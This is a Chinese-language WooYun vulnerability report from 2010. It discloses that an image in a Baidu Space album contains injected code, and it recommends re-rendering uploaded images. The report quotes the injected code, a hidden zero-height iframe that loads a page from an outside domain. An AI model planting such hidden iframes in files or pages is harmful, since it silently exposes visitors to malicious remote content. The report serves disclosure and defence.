漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2010-0716
漏洞标题:百度空间上传图片中包含恶意代码
相关厂商:百度
漏洞作者: 路人甲
提交时间:2010-10-20 12:01
修复时间:2010-11-19 15:00
公开时间:2010-11-19 15:00
漏洞类型:xss跨站脚本攻击
危害等级:低
自评Rank:5
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2010-10-20: 细节已通知厂商并且等待厂商处理中
2010-10-20: 厂商已经确认,细节仅向厂商公开
2010-10-30: 细节向核心白帽子及相关领域专家公开
2010-11-09: 细节向普通白帽子公开
2010-11-19: 细节向实习白帽子公开
2010-11-19: 细节向公众公开
简要描述:
百度空间某相册中,上传的图片中,图片被加入恶意代码,某些浏览器解析图片时候,可能会把恶意代码解析,对客户端产生威胁。
详细说明:
图片位置:http://hiphotos.baidu.com/ruyanshihe/pic/item/a0119cecc26a407179f0555c.jpg
被加入代码:
<iframe src="http://w.mh8888.cn/ad.htm?a" width="100" height="0"></iframe>
chrome浏览时,在图片正常解析的情况下,代码虽然未被执行,但杀毒软件报告了。IE6下估计会被解析。未测试。当浏览者是小白的时候,这种提示,会让小白害怕,对百度的“名声”产生影响。
漏洞证明:
修复方案:
前段时间,80sec爆了nginx webserver下php.ini参数不当,导致nginx解析漏洞。但这件归根结底是隐患出现在哪里?php参数配置不当?我觉得不是。我觉得问题的主要原因是上传的“图片”不合格,假如包含恶意代码的文件根本不会被保存到服务器上,那么这种问题就不会发生。个人认为,对上传的文件(图片)严格控制,最好用GD重绘图片,使得伪装成正常图片,且包含恶意代码的文件,不包含恶意代码,成为正常的图片。
版权声明:转载请注明来源 路人甲@乌云
漏洞回应
厂商回应:
危害等级:低
漏洞Rank:5
确认时间:2010-10-20 15:09
厂商回复:
感谢提交
最新状态:
暂无